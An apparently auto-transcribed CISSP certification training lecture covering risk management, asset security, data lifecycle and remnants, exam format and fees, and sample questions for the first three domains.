How they can be implemented to bring down to a acceptable level so again risk acceptance risk appetite of an organization comes into the picture these terms are then discussed uh in the training to understand how the policies would work around the risk management strategy moving on then looking at monitoring
Security control so once we have security controls in place we have assist them we also need to monitor them for the effectiveness and though they are going to create any alerts or any risks are being realized or any new risk that may be created by the security control implementation so in these risk
Assessment these are the frameworks these are the steps that we want to follow to identify mitigate and monitor these risks so the management begins with risk assessment what do you mean by risk assessment identifying the impact of the risk that the risk would have on the organization and there would be two
Different ways to assess the risk a quantitative assessment or a qualitative assessment a quantitative assessment is more quantifiable or is numerical in in its process where you’re looking at assigning costs to particular assets and the threats so the losses that you may figure out in a risk assessment strategy
Would be more numerical where would be in a currency format where let’s say a risk if realized would lead to a loss of extra amount of dollars that’s where the quantitative analysis comes into the picture the qualitative analysis would be quality of a service so if a service
Is being affected because of a risk what is the degradation of that service to what aspect is is it getting degraded for example internet that we use if there is an internet outage or if there is a reduction in internet speed right so if i’ve got a 10 mbps line and now
Because of some fault of the isp it gets reduced to 4 mbps i may not be able to conduct the business that i would i was doing on a 10 mbps line thus the quality of that device has degraded uh does it is going does it is a risk and it is uh
Causing me losses right so qualitative risk analysis would be more descriptive in nature rather than be numerical in nature uh most of the companies or organizations would follow a hybrid policy because it is not possible to have a quantitative quantitative risk analysis in each and every scenario new organization which doesn’t have much
Data to rely on historical data of how threats have affected that particular organization may go in for a qualitative one and as they mature over time in the security practices they may then turn over to a quantitative risk analysis or a hybrid risk analysis where they’re using a combination of quantitative and
Qualitative both thus uh the risk controls that we were talking about risk acceptance risk reduction and risk assignment uh there is risk avoidance as well so there are four controls the risk reduction is where you have implemented a security control based on which the risk has been reduced
To a more acceptable level risk assignment is where you’re also known as risk avoidance that’s where you’re avoiding risk by outsourcing it so talking about risk controls again the four types being accept avoid transfer and reduce risk acceptance is where uh your the organization is willingly
Accepting the risk as the way it is because they don’t want to deal with it right now they might deal it with it in the next iteration or it doesn’t it is at an acceptable level and the company just wants to move on avoiding the risk
Is where you are going to try to not use the service where the risk exists thus avoiding is where you have identified a particular service where the risk exists and now you’re not using the service to avoid the risk altogether risk limitation or risk reduction would be where you are implementing a security
Control to mitigate the risk and then risk transference is where risk assignment comes into the picture where you are transferring it to a third party like outsourcing it by using insurance to limit the risk so for example the threat is of a fire the risk is high but
You cannot do anything about it so you purchase insurance so if the fire actually happens you would still be reimbursed for the losses that you have faced coming back to counter measures we have discussed administrative uh countermeasures these are policies rules regulations laws customs that a company
Needs to adhere to based on the industry that they are in then there are technical controls software controls anything that is technical in nature ids ips firewalls encryption anything that is going to help you implement the cia and then physical where you would look at locks on doors security guards at
Offenses where they’re preventing access to unauthorized people let’s talk about roles and responsibilities of management now as far as management is concerned or the hierarchy is concerned uh you can see on the screen there’s a senior management the security professional data owner custodian and user now these are from exam perspective from the
Certification perspective obviously the hierarchy in an organization would be slightly different but here the senior management is the responsible party for the entire security mechanism so they must drive the entire security pro exam so cissp talks about a top-down approach where the senior management has realized the importance of security and is
Implementing at all levels within the organization thus they are a part of it and they are supporting the security program they define the tolerance of risk of how much risk is stopping to be tolerated by an organization from a monetary perspective or the qualitative perspective as well depending on the laws legislations regulations
Compliances and the contracts the business has signed they will rely on security professionals to manage the risk but the exercise and the management process has to be defined by the senior management once the security team comes up with counter measures the senior management either approves or disapproves them based on the return on
Investment of that counter measure the security professional assist with the development of policy documents gives their inputs because they are the people who are in the day-to-day process of dealing with these thus they can identify gaps and give good inputs to modify or to create the policy in a more robust manner the
Security professionals may be a part of the risk assessment and risk management team as well especially uh the security technical aspects of it assist with the implementation and maintenance of countermeasures so the administrative technical or physical measures that you have identified you may be requested to implement that for example the locks
That we have on the door the swipe locks that are connected to a database where the database is maintained so as a security professional you wouldn’t be responsible to fit those locks but to create the database manage and maintain the database where that information is kept upon where people are authorized
And authenticated and would be responsible for monitoring auditing and security assessments as well the data owner the owner of that particular data part uh would normally be the head of the department for example the sales data is normally owned by the director of sales of that department so that they
Would be ultimately responsible for identifying that data classifying that data and accepting the security controls that are implemented they may request for additional security controls if they deem fit the security professional implements the security controls then the custodian a person who is responsible for implementing the approved security controls or managing
The day-to-day activity of the security controls for example the security professional has identified an access control to be implemented on a data set that the data owner owns the data owner has approved of it it is the custodian who is going to implement that strategy or implement the control uh on it the
User is basically the user who or the person who accesses the information and id resources does whatever access controls have been implemented would identify the user authenticate authorize them and help them accountable for whatever they are doing if the user is unable to authenticate access would be
Denied we will focus on the second domain of cisp which is asset security so let’s understand the need for asset security through a small scenario well it was yet another regular day in tim’s organization everything was going on fine until the organization faced a cyber attack the
Hacker hacked all the servers in tim’s organization the organization had loads of data not all of the data had the same level of protection the level of protection varied from one piece of information to another in this scenario the hacker could hack into only that particular data which was less protected
However this cyber attack had a huge impact on the organization in addition to this it was also discovered that there was some flaw in the information classification process that exposed even sensitive data to a cyber attack in other words even crucial data was left with very less protection this gave rise
To asset security asset security is defined as the process of collecting and protecting assets such as data and devices asset security helps an organization understand and classify data with respect to its importance which in turn makes sure that highly valuable data receives the most protection asset security achieves its goals
Through its domains the domains are information classification then we have data classification data lifecycle data remnants and finally we have data loss prevention each of these domains have different goals all of these domains together make up asset security now let’s have a look at each of these domains individually first
Up we have information classification as you saw what happened in tim’s organization it has understood that importance of data varies largely we have to classify data before we can move on to protecting it we need to be able to identify which is the most crucial data with respect to organizations
Information classification is defined as a process of segregating data based on its importance to provide adequate level of protection to every piece of data information classification is different for each sector based on their objectives the classification varies in the general sector information classification is used to minimize risks
On crucial information whereas in the government or military sector it is used to prevent unauthorized taxes and finally in the commercial sector it is used to keep sensitive information private here it is seen to it that information is not disclosed to a company’s competitors let’s now move on
To our second domain that is data classification as the name suggests here data is basically classified based on a set of considerations here we will look into factors like data retention requirements then data security requirements data disposal methods data encryption requirements and finally compliance requirements so these are the
Factors which are taken into consideration while classifying data this entire process of data classification is taken care of by the data owner in addition to the classification they also analyze the use and value of the available data to the company finally the data owner also annually reviews the data classification
Before classifying data an important step is to understand the data life cycle all of us speak of data all the time however do we know the various steps a piece of data goes through well for that let us have a look at the third domain data lifecycle we will start off
From the data creation step and understand what happens to the data after that as you see on your screens we have six steps in the data lifecycle stage they are create store use share archive and destroy starting off with the create phase this is the first
Step in data lifecycle here new data is generated or the existing data is updated after the data is created we use data repositories to store the created data without storing data we cannot derive any information from it hence this step is very crucial in the third
Phase data is viewed or used in some application or processed in addition to data being viewed and processed it is also shared between various users and customers our fifth face is archive here data which is not used frequently that is inactive data is identified and then moved into long-term storage systems and
Finally we have the destroy face as the name suggests data is simply destroyed here data can be destroyed either digitally or physically not to forget you cannot simply destroy data it should be done based on regulations but have you wondered what happens if data is not
Destroyed even after we try our best to erase it well this gives rise to data remnants in simple words data remnants is a term used for the residual of digital data which remains even after attempting to erase that particular data data remnants should be avoided as it is
Not good to have remains of a piece of data which was intended to be destroyed security professionals should be well versed with techniques to avoid data remnants so how do we tackle data remnants for this we have various methods they are purging clearing overwriting degaussing storing and
Finally destruction let’s have a look at each of these methods individually and understand how they help in tackling data remnants first up we have purging purging is done to minimize risks on crucial information in clearing data from storage devices are removed however it can be reconstructed by using various softwares
Third we have overwriting here we write over the original data several times so that the original data cannot be recovered degaussing is the method used to destroy data on magnetic storage tapes next up we have storing before storing data on media the data is encrypted for the purpose of safety
Finally the sixth method is destruction here storage device which hold the data are physically damaged incineration crushing and shredding a few of the methods used for destruction now let’s move on to our fifth domain data loss prevention in this domain various security measures are adopted that will
Help in making data available to only the authorized users here we will look into four of such measures the first measure is data inventory in this step data is identified and then classified in the second step the data flow is plotted over the life cycle the third measure is data protection strategy here
A number of risk assessments are performed the fourth measure is implementation in this step we take up cases which have had a history of data loss for testing purpose those were the five domains under asset security in addition to these it is also required that we understand the term privacy with
Respect to asset security privacy is a very crucial aspect when it comes to wested security information privacy and data privacy are more or less the same this term is used to differentiate one person from another it relates to the personal data stored on computers so what kind of data falls under this
Category well we have data such as medical records office data financial data etc which fall under this category to uphold privacy we use technologies like pseudonymization tokenization and anonymization well pseudonymization refers to a data management process anonymization refers to a process of either encrypting or removing personally
Identifiable data so that people who the data describes remain anonymous and finally in tokenization a sensitive piece of data is substituted with a non-sensitive equivalent cissp stands for the certified information security or rather certified information system security professional it is considered as a gold standard in the field of information security it is
A management certification so when you are in the senior management this is the kind of certifications that you would require for your management skills now this is a non-technical or a semi-technical certification here it’s nothing about vulnerability assessment or penetration testing you’re not going to do anything
Hands-on you are not expected to know hacking or you are not expected to know how to configure firewalls anti-viruses and whatnot it’s basically something that over a period of years of experience you have evolved a certain understanding of how security policies should be constructed how they should be
Implemented and how security affects an organization so here you are responsible to create a overall security policy for an organization to help maintain the security posture of an organization now as far as the certification is concerned it has a validity of three years after which you don’t have to give the exam
Again however during these three years you have to earn a certain point so it is known as a continuing education points that isc square allows you to generate points by attending lectures or by attending webinars by publishing white papers by providing trainings obviously all of these should be
Authorized and you should have a validation from a authorized party that you have done this activity once it is verified you will be awarded certain points once you have collected sufficient for a number of points you will retain your certification beyond three years the passing rate of this
Exam is less than 50 so it’s not how much you require to score what this basically tells you is the amount of people who actually clear the exam in the first attempt now let’s not get disheartened because of this essentially the exam is quite tough it’s known as a
Mild white and inch deep exam that means you need to know just about everything and anything that is there to be known in information security and that’s something that we are going to discuss when we go into the eight domains of cissp what happens is there are a lot of
People who are not actually prepared for the exam who think they are prepared attempt the exam and sadly fail in their first attempts some people just misjudged the exam and not prepared for it so the fact that i’m trying to put across is be very well prepared i have seen people who study
For months together attempt a lot of questions ensure that their knowledge is up to the mark and only then do they attempt the exam anybody can register for the exam to be honest and clear the exam as well however to get certified there are two different avenues so if
You have a experience of at least five years in two of the domains that are in the cissp course you get certified so even if you clear the exam there is a validation process that happens after the exam where you have to submit documentation to prove to ise square
That you have that level of experience and once it is pro proven and validated you get certified as a cissp if you do not have that five years of experience you get certified as an associate of isc square for cissp and they give you six years during which you can achieve the
Level of experience prove it to them and then get certified as a cissp so you can see the stringent levels that are taken for this certification the validation is basically documentation and proof that you have to submit and which is verified so even after you clear an
Exam to get validated and get certified it can take up to five to six weeks for isc square to validate and provide you with the certification with that let’s go and see the exam let’s have an overview of what the exam is all about the governing body is ise square that’s
What we have been referring to and the professional experience at least four years of college degree or additional credentials from isc squares approved list that will satisfy one year of required experience and five years of paid full-time work experience in two or more domains like i said anybody can
Give the exam register for it attempt it once you clear then that’s where the criteria of your work experience comes into the picture you prove five years of experience probably by a letter from your organization from your hr saying you have this kind of experience that is relevant to the certification the issuer
Will validate it you get the certification if you don’t have that experience you get associate of isc square and then you get six years to attain that level of experience after which you can get certified the exam fees were 699 so it’s an expensive exam a single
Attempt for each voucher so if you fail that’s another 700 for the second attempt the fact being if you fail for the first time you cannot attempt the exam for the next 30 days if you fail for the second time you cannot attempt the exam again for the next 60 days and
If you fail for the third time you cannot attempt the exam for another 90 days so there’s a cooling off period after each attempt so i would suggest study hard go for the first attempt clear it and nail it the maintenance fees for your certification is again 85
Us dollars for three years the exam length is three hours and the questions could vary from 100 to 150 150 being the max questions that can be asked in that exam you can clear the exam well before 150 questions so be prepared for that as well but imagine when you’re walking
Into that exam bear in mind that you will be asked 150 questions and you have to time those in three hours 180 minutes that’s what three hours is so if you do the math not much time for every question so it’s just a minute and a
Half or less than that for each question and the questions could be very descriptive could be confusing so you have to have your mental faculties really strong during the exam the passing score is 700 out of a possible 1000 points exam language is english testing centers there are isc square
Authorized centers where you need to book that exam there’s a huge process that you have to follow to wherever you go for the exam itself so once you have registered on the isc square portal and you purchase the voucher they will give you a list of centers in your vicinity
That you can look into they’ll give you a calendar to give you the possible dates that you can attempt the exam on select the center select the date reach the center at least half an hour before the scheduled time there is a verification so you have to carry your identification a government issued
Document either a passport driver’s license where you have to prove that you are who you say you are and once the verification is done only then do you get to attempt the exam the question formats are three types multiple choice drag and drop and hotspots multiple
Choice is the format that we are going to look at when we look at sample questions it’s the same they give you a question they give you four options either one or more options need to be chosen they will specify if there is more than one answer to that particular
Question in a drag and drop it’s most like uh more like match the following so there will be a column a and column b and uh they’ll ask you a question and say okay column a gives you the options drag and drop whichever correct answer
Is in c is from column a to column b and then submit the answer if the answer is correct you get awarded the points else there is no negative marking the third is a hotspot a hotspot question is basically a diagram let’s say architectural diagram that will be
Presented to you and they will ask you to pinpoint a certain aspect within that diagram for example they may give you an architectural overview of a network of how it has been established and they will ask you for a network-based firewall which is the most likeliest area that you want the
Firewall to be placed in so you don’t need to know how to configure the firewall but from an architectural perspective you need to know where that firewall needs to be placed for it to be the most effective for the given scenario in the question these are the
Domains that are asked so you can see it basically covers anything and everything that is there in information security it starts off with security and risk management which weighs 15 in your questions in your exam so if your exam is 115 questions 15 percent would be around they’ll have around 20
22 odd questions and risk management being one of the most important topics for these kind of certifications then uh asset security which covers 210 percent of your questions so that’s around 15 questions security architecture and engineering this is where your infrastructural knowledge uh your security architecture your enterprise
Architecture all those come into the picture there are a lot of theoretical models that you need to study in domain 3 and that covers 13 of your exam communications and network security this is the most technical topic within all these eight topics this is where you talk about networks you
Talk about tcp you discuss protocols like tcp udp you discuss different attacks man-in-the-middle attacks toss attacks and this basically has 14 percent of weightage then you have identity and access management which basically talks about users subjects objects subject being the user object being the resource and a relationship
Between these to be created where people are authorized for some activity authenticated and only then allowed and also held accountable for whatever activity they have done then you go into security assessment and testing so vulnerability assessments penetration tests software test uh testing sas tasks a little bit all those will be covered
In domain number six which has twelve percent weightage then security operations so security operation center or the stock day-to-day management of incidents so your incident management would come into the picture problem management change management all of those things would come under domain 7 as security operations which has 13 of
Weightage and then finally software development security now you don’t need to know development or you don’t need to know any programming there are no program based questions they’re not going to ask you how to code they’re going to ask you how to manage a software development life cycle or a
Secure software development life cycle so this is where your waterfall models modified waterfall models spiral agile devops devsecops all come into the picture and this has 10 percent of weightage now it is near about impossible for everyone or anyone to get experience across all these domains so
You will have your strong points and you will have your weak points the task is to identify where you’re good at understand those things make the maximum amount of it then identify your weak points and start developing on those if you are able to look at it from a
Theoretical perspective however if you can get an internship or if you can get a you can say just an insight of how it works in the practical world it would be very helpful now that being said as far as cissp exam is concerned it involves a very ideal world the real world actually
Doesn’t come into the question because the real world will have a lot of business logic to it by business logic what do we mean every organization will modify their projects based on the expertise that they have based on the talent that they have and based on the people
Or the hierarchy of the organization that has been established so it can be customized to each and every organization since an exam cannot deal with these kind of customizations we deal with an ideal world so for the cissp exam we assume that we have all the resources we have all the people
That are required we have an hierarchy in the training which is given out where we have rules for each and every person and job titles for each and every person right so when we go through the training it is very essential that we understand what these job roles are what their
Responsibilities are so that when we get those questions we can identify which person is going to attempt what in the real world things are very different we piggyback we take on multiple responsibilities and that is something that cissp doesn’t adhere to so you have to be very careful identify the job
Roles identify the responsibilities have that map the hierarchical map created very well and then try to implement the ideal world scenario from the cisp standards to see what is going to happen that being said let’s move on let’s discuss the domains now these domains we’ve already seen what we can do is we
Are going to move on to the sample questions for each and every domain once we reach the domain we’ll see what the topics in that domain are we’ll look at the sample questions then we’ll look and go to the next domain see the topics in that domain and then look at the sample
Questions as well so what to study and those sample questions revolving them so looking at the first module offers domain security and risk management now this is one of the largest domains that could be debatable for me i would say the largest domain could be domain number three security architecture and engineering uh
Could also be domain number four because it is quite technical communications and network security and could also be security operations because that’s incident management change management problem management altogether but each domain is very important from the exam’s perspective if you’re thinking about keeping a domain for options forget it
That’s not the right way to address the exam let’s start off with the first one security and risk management this domain teaches you all about information systems management and this talks about risks and everything so what we are going to do is we are just going to go
To the official document from iac square where these domains and their topics are given so that’s the exam outline from cis from ic square towards cissp this is the latest document that is there available online you can see the url in my browser address bar and these are the
Eight domains there’s the exam three hours number of questions 100 to 150 multiple choice and advanced innovative questions that’s where the drag and drop and the hotspot comes into the picture though based on experience i can tell you that 90 of your questions will be multiple
Choice 10 would either be drag and drop and hotspots passing grade is 700 out of 1000 points exam language availability is english those who want to attempt in other languages it is available but then the exam is six hours and the questions are 250. so that’s your option depending
On which language you’re most comfortable with we are going to go with english that’s the language options coming in cissp linear exam 6 hours 250 questions everything else remains the same these are the languages supported french german brazilian portuguese spanish japanese simplified chinese and korean the weightage i guess remains the
Same and that’s the first domain security and risk management so what does it pertain to understand and apply concepts of cia confidentiality integrity and availability in the first video we have gone through uh all the eight domains at quite some length we have discussed what cia is all about and
How their interrelationship is so if you want a deep dive or rather a deeper dive than what we are doing for the domains go back to the first video uh look into that and then you can come back to this video again so evaluate and apply security governance principles so we
Have to understand what governance is now governance is basically having a overlying architectural security policy that can be integrated with an enterprise architecture and thus having your security policy in alignment with the business goals and objectives security should never become a hindrance for a business security should always
Become a supporting feature which should allow the business to be executed in a secure manner so as a security expert our first goal is to identify what the business does what the business processes are what is the business trying to achieve and then we try to create a security policy revolving these
To enhance the business functionality uh in a overall picture so you’re looking at organizational processes acquisitions divestitures acquisition is when let’s say scenarios where you have trying to create a security governance policy now the business is trying to change because they’re trying to acquire another organization and merge it within
This organization and now your security policy should encompass not only your organization but the newly acquired organization let’s say the next five years a business decides that the newly acquired organization is no longer profitable and they want to sell it off and now that’s where the diverse share
Comes into the picture you are now trying to separate the entity that you have just integrated in your security policy and you are now trying to separate it with confidentiality integrity and availability of the company’s data intact without affecting the organization at any point in time understand the fact that security is not
Only about hacking or getting hacked it’s about being secure at all points in time during business uh continuity and business let’s say business as usual kind of activities so that’s where your security control frameworks would come in you’re going to talk about iso 27001 we are going to talk about cobit
Pci dss nist 800 series and so on so forth and the most two important statements or terms in the cssp is due care and due diligence due care is you doing your own research to identify what security controls need to be implemented or what kind of governance needs to be
Implemented and due diligence is you yourself spending that much time money effort into implementing those decisions that you have come come across during the due care thus enhancing the security functions of an organization so when we talk about business requirements for a business to be effective at the same
Time it needs to be legal it needs to be compliant to regulations and laws and to the contracts that have been created by the organization so as far as the concept goes when we say that security needs to be in alignment with the business requirements the business requirements imply that the business is
Legal is compliant to regulations is compliant to their contractual obligations and is following standards that have been prescribed to them so all of them come together and that’s where your security mapping comes into the picture we are looking at legal and regulatory issues like cyber crimes and data breaches licensing and intellectual
Property requirements and so on so forth and it will also include isis squares code of professional ethics now this is a document apart from the eight domains that we have talked about thus what does this document talk about this is the prescription from iic square of professional ethics for a cyber security
Professional expect around four to five questions from professional ethics as well so not only is this a document that you need to read and adhere to you will be questioned upon this in your exam and these are easy points to score professional ethics something that is ethical something that is not against
The law so it’s kind of quite easy but the questions can be confusing so you need to go through the entire document really well and then your organization will have its own code of ethics however if you look at the hierarchy ic squares ethics comes first so your organizational ethics should not be
Contradictory to ic squares ethics in the first place then develop document and implement security policies standards procedures and guidelines identify analyze and prioritize business continuity requirements so here that’s where your risk assessment comes into the picture if you’re looking at a particular risk that means a particular vulnerability has been identified you
Want to see the likelihood of that vulnerability being exploited and then the business impact analysis that it may have based on which you would then create a plan to mitigate that particular risk by having a business continuity or a disaster recovery plan coming into the picture
Now this is as far as this domain is concerned you’re calculating the risk it doesn’t actually tell you how to mitigate that risk that’s when you go into the next future domains and discuss those technicalities so you can see uh contribute and enforce personnel security policies now the thing about
Cissp is physical security also comes into the picture why because if uh hardware is not well protected there would be physical attacks social engineering attacks that could be created which would lead to uh data leakage as well and the first and the foremost most valuable asset of an organization is always human personnel
So cissp would also deal with people protection in the first place for example protecting people against social engineering attacks making them aware about these attacks if there are natural calamities you have to plan a plan for them during your disaster recovery and business continuity plan and ensure that
People are safeguarded not only that you have to tie these things up with identity and access management for example account creation account management onboarding of employees off-boarding termination of employees third-party contractors consultants that you’re going to hire which are not employees but third parties coming in to your organization providing intelligence
And so on so forth so all of those come into the picture as well and then that’s where your risk of management concepts come in it gives you a very good overview of how to identify those risks and so on so forth now this is what the
In the first domain is all about it itself is very huge and as we go ahead we can tie this domain to the rest of the domains for more deeper analysis go to the first video and then we can come back to this so let’s start with the
Questions the first question now these are very short one-liner questions your exams would be more descriptive to be very honest with you if you go online no matter what practice questions that you try or whatever dumps if you can find those you will find none of them will be
Ever any close to the actual exam questions you will find a lot of sites online that sell you cissp dumps with 100 guarantee for you to clear don’t fall for that it’s just a money making scam those questions will be similar questions something that will give you
An insight about what the exam is going to be but when you attempt the exam you will find out that those questions are very different from the actual exam itself coming back to the questions the primary goal of security awareness program is now what is the security
Awareness program and why is it created the primary goal so is it to provide a platform for disclosing exposure and risk analysis to make everyone aware of potential risk and exposure to provide accurate risk and exposure results a way of communicating security procedures now the answer to this is to make everyone
Aware of potential risk and exposure doesn’t mean that you’re trying to make everybody ethical hacker what you’re trying to do is in your organization you are trying to create a security awareness program which allows your employees to know what kind of policies exist in your company what rules need to
Be followed what are the procedures that need to be followed for them to safeguard themselves and company assets as well and ensure that data leakage and data loss are kept at a minimum so you’re basically trying to make everyone aware of the risks that they may have for example social engineering
Not clicking on links not going to unwanted sites and so on so forth question two a contingency plan should address which of the following potential risks residual risks or identified risks now what is a potential risk a potential risk is something that you may foresee in the future something
That may exist a residual risk will come to that what is an identified risk a risk that has been identified is known to the organization and the organization is aware of it so potential is something that may come into the future identified as something that exists right now a
Residual risk on the other hand is a risk that was identified earlier on mitigated but after mitigation there is still amount of residual risk that exists so these terminologies need to be understood really well for uh let me give you an example of a residual risk so let’s say there’s a sequel and
Injection a flaw that has been identified in an application and that’s a now that’s now an identified risk now you’ve got two options in front of you go through a software development life cycle again record that part of the application to mitigate the risk or else have a security control like a firewall
A web application firewall watching that risk now the ideal scenario would be that you go through the development process again but that is going to take time so you put in a compensatory control uh that is a web application firewall in the meanwhile to mitigate that risk and then have the recoding
Done and then later on resolve the risk all together so when we put in the firewall to mitigate the risk temporarily is the risk actually addressed no there is still a possibility of a sequel injection attack happening but we just have it mitigated to a certain extent because there is a
Firewall watching it so that means that there is still a residual risk a risk that is remaining even after me integrate implementing the security protocol or the security control that is what a residual risk is something that remains even after i put in a security control
Which can be taken care of later on or can be accepted and just moved upon so coming back to the question a contingency plan should address which of the following either a potential risk a residual risk an identified risk or all of the above and the current answer to
That is a residual risk what is a contingency plan a contingency plan is i still have a security control but something may go wrong and for that i want a secondary control to be in place to ensure if that if the first control fails the second control would still be
Able to identify that and stop the security incident happening so we are looking at residual risks and then having contingency plan to manage those residual risks question three when the cost of the counter measures outweigh the cost of the risk the best way to handle the risk is to reject the risk
Transfer the risk accept the risk or reduce the risk now there are four ways a risk can be managed right accept the risk avoid the risk transfer the risk or mitigate the risk right rejecting the risk is not an option but what is the question cost of a counter measure
Outweighs the cost of the risk so what is the cost of a risk the cost of a risk is basically the impact that the organization is going to face in a monetary manner if the risk is realized to mitigate that we have a counter measure in place so if in the previous
Example i have identified a sql injection attack and the counter measure to that is me implementing a security control a web application firewall to mitigate that risk however if somebody executes that risk somebody does a sequel injection attack the loss that i’m facing is only a hundred dollars per
Incident and the maximum incidence that can happen in a year are 10 so 10 into 100 is 1 000 per annum is what that risk is going to cost me for me to implement a web application firewall on an annual level it is going to cost me let’s say fifteen
Thousand dollars in licenses management salaries and all of those things which means that i’m facing a loss of one thousand dollars but i’m spending fifteen thousand dollars to prevent that loss i rather have the thousand dollar loss than spend fifteen thousand dollars right so in this scenario the cost of
The counter major is outweighing the cost of the risk by fourteen thousand dollars so in this scenario which is the best way i would do it either reject the risk which is never an option because you cannot reject the risk transfer risk what is transferring your risk
Transferring it to a third party by purchasing insurance example right so if i purchase insurance saying if this uh if this gets compromised it’s the insurance company is going to make the payments i’m safeguarded or accept the risk or reduce the risk so in this scenario accepting the risk is basically
Accepting the risk the way it is moving on because there is nothing that you can do about the risk and you are willing to accept the risk rather than spend money on it and reduce the risk is mitigating the risk by implementing the firewall and spending that money and then
Incurring those losses so the best answer out of this is accepting the risk why can’t i transfer the risk because there is no such insurance where i can in the given example where i can get that kind of an insurance policy reducing the risk would entail me spending that fifteen thousand
Dollars to mitigate the thousand dollar risk does incurring a fourteen thousand dollar loss which is against the business logic a business needs to make money not spend money and that’s the fourth option that’s left that’s accepting the risk which means we are not going to implement the firewall
Because it is outweighing the cost of the risk we are just willing to accept the risk itself and move on that’s the first domain moving on to the second which is asset security consists of topics about physical requirements of information security let’s go back to the document in hand so moving on to
Domain two asset security we talk about assets assets could be now okay let’s get into the definition of what an asset is asset could be anything that has a monetary value associated with it from the organization’s perspective it could be data it could be virtual assets it
Could be physical assets it could be anything and everything it could be a license right you purchase an operating system the operating system comes with a virtual license that installs on your machine or or is associated with an email address even that license as a value does even that license will become
A set so the basic definition is anything and everything that is owned by the organization and has a monetary value associated with it right thus you’re going to we talk about asset classification as well asset classification could be data within data itself there would be sub classifications like confidential data
Non confidential data public data and so on so forth physical assets virtual assets networking assets anything and everything that you can come across would be classified here determine and maintain information and asset ownership so your asset management program comes into the picture and when you say asset ownership the organization owns the
Assets as they are however roles and responsibilities that you have created in the organization will ensure that some assets are virtually owned by somebody that means that they are responsible for the well-being of that asset so you have to identify who for example hr now hr is a function human
Resources but they also need it assets for example a payroll which will institute a payroll software a database right a web application server if you will and all of these assets are now owned by the hr department so there are hundreds of people in hr so who exactly
Owns this that’s where we identify the owner of that particular asset saying you are responsible for the well-being of these assets you belong to this department so normally the head of that department would be the owner of those assets and would determine what kind of access controls what kind of maintenance
Management security mechanisms are required then we talk about protection privacy so data owners data processors remnants collection limitations determining uh ensuring appropriate asset retention so let’s say data right uh even if i have data how long do i retain data if you go into privacy acts of organizations or of countries rather
So gdpr for european union gdpr basically states that you will only retain personal identifiable information for as long as the organization requires it the moment you have no reason to have that data with you you’re going to delete that data so which means automatically says you’re going to
Retain that data till it makes business sense once you figure out it doesn’t it is not required you’re going to delete it in a secure manner which is not recoverable to unwanted parties so you have to determine those asset retention periods we have to understand what those attention retention periods are so when
You for your physical assets there will be a life of the said that is associated with it and once the life of that asset is over every even if the asset is working properly you have to discard that asset and you have to replace it you have to do this with security in
Mind then the security controls for all of these things understanding data states data states could be in three different aspects data in motion data at rest and data in use how are you going to secure data during all these three stages what are the protection methods that you’re going to utilize then in
Establishing information asset handling requirements so that’s what domain 2 is all about let’s look at the questions so the first question in domain 2 which of the following is responsible for setting user clearances to computer-based information is it operators data owners security administrators or data custodians understand the question who
Is responsible for setting your user clearances to computer-based information and the correct answer to that is security administrators they are responsible for setting the user clearances who are going to be responsible for allowing the user clearances that’s going to be data owners what is generally concerned with personal security management controls
Operational controls technical controls are human resource controls now what is personal security personal security is people-centric security you’re looking at people and you’re ensuring that their security comes into the picture technical controls can be used for data assets or physical assets like information technology but technical
Controls may not be that relevant for a human a firewall is not going to help anyone any which ways management controls are administrative controls that means a policy that will help you implement controls but for personal security is the operational controls that are going to be associated with it
Which of the following factors determines the frequency of information security audits in any given environment so the age-old question for you to remain secure how often do you want to conduct a security audit to verify your vulnerabilities your penetration test to verify your security controls are working properly so would it be
Dependent upon asset value the risk based approach management discretion or level of realized threats and here the answer to that question is risk the moment a risk is identified for example at what various stages would a security audit be triggered for an individual asset as well and that can be tied down
To incident management change management and problem management so if there is an incident a security incident with a database server where there has been an attack on that server i probably want the security audit done on that server to identify vulnerabilities flaws and then to mitigate those risks similarly
If there is a change that has been going on into your organization you first want to go into a risk assessment strategy and then you want to look at security audits based on the risk that you have identified right so a security audit is not only periodic based on compliances
Or regulations but it also can be integrated really well in your incident management problem management and change management scenarios that’s domain number two all right let’s talk about domain three security architecture and engineering now this is where you tie up security architecture and enterprise architecture if you look at the first
Domain we have talked about risk assessments we have talked about confidentiality integrity and availability and then we have moved on to the second domain where we talked about asset security so that’s where we talked about data data classification asset classification now it starts off with the enterprise level architecture
So something like togaf what is enterprise level architecture it’s basically data center architect and a network architect trying to create data flows deciding how communications are going to happen between various devices they’re going to try to do network segmentation for web application servers database servers look at network isolations network access control lists
And may even decide how firewalls and where firewalls would be required once that architecture is created we need to secure that architecture to ensure that whatever data communications are happening within that framework they are secured in a manner where all the risks that the organization may be exposed to
Are either managed mitigated accepted transferred whichever the way it is right so here you start off with physical security you start up with trusted platform modules so looking at the outline this is where it starts off with implement and manage engineering processes using secure design principles so this domain will talk about using
Togaf and then using a zac man framework to interact with all the data owners all the asset owners querying them about the security of the assets the requirements because it is not the security architect who determines how secure the device will be it is the asset owner who determines the
Requirement of security for example continuing with the hr example that we were talking about earlier if the hr department of head is responsible for the database for the payroll application it is that person who would be determining the security levels so based on the security architecture let’s say the zachman framework we would
Create a questionnaire that needs to be filled out by the asset owner the hr department of head and would be supplied to us the security heads and then we would try to create a security profile based on their requirements so if the hr department head comes back to me and
Says that they require to be adhering to a particular standard or they want x kind of security it is us who will validate that requirement and it is us who will execute it and protect that asset based on their requirements so this is where your service security architecture meets enterprise
Architecture by using various frameworks this domain will introduce you to not only zachman framework it will again take you to a trusted platform module it will talk about itsec tc sec common criteria and so on so forth so this is again a very extensive module some people struggle with it because it
Is a largely a theoretical module and some people would struggle with the concept of how what is a security architecture and an enterprise architecture it is very important to understand the differences between them for example togaf is an enterprise architecture where a data center architect would deploy and streamline
Those devices on which a layer of security architecture such as iso 27001 would be implemented to enhance the security and ensure that the infrastructure remains protected at all point in time this module will also deal with managing vulnerabilities on assets applications web-based systems mobile systems and embedded devices so this is
Where your engineering comes into the picture by this module we mean when we are deploying infrastructure we need to engineer it with security in mind we need to architect in such a way that security enhances the business needs business requirements and they are executed in a secure manner let’s look
At a few questions based on domain three question one when a computer uses more than one cpu in parallel to execute instructions it is known as multi-processing multitasking multi-threading or parallel running now here we need to understand what is the difference between multitasking multi-threading multi-processing and parallel running now it would be very
Difficult to explain all these processes in in this video so here we are talking about executing instructions that’s multi-processing multitasking is performing multiple tasks at the same time multi-threading is where processors create their multiple threads to manage certain functions here when we are parallely executing instructions it is known as
Multi-processing question two who mediates all access relationships between subjects and objects of a system now what is a subject what is an object and what are access relationships so access relationships would be your permissions that you have created now what are permissions permissions would be something that a person is
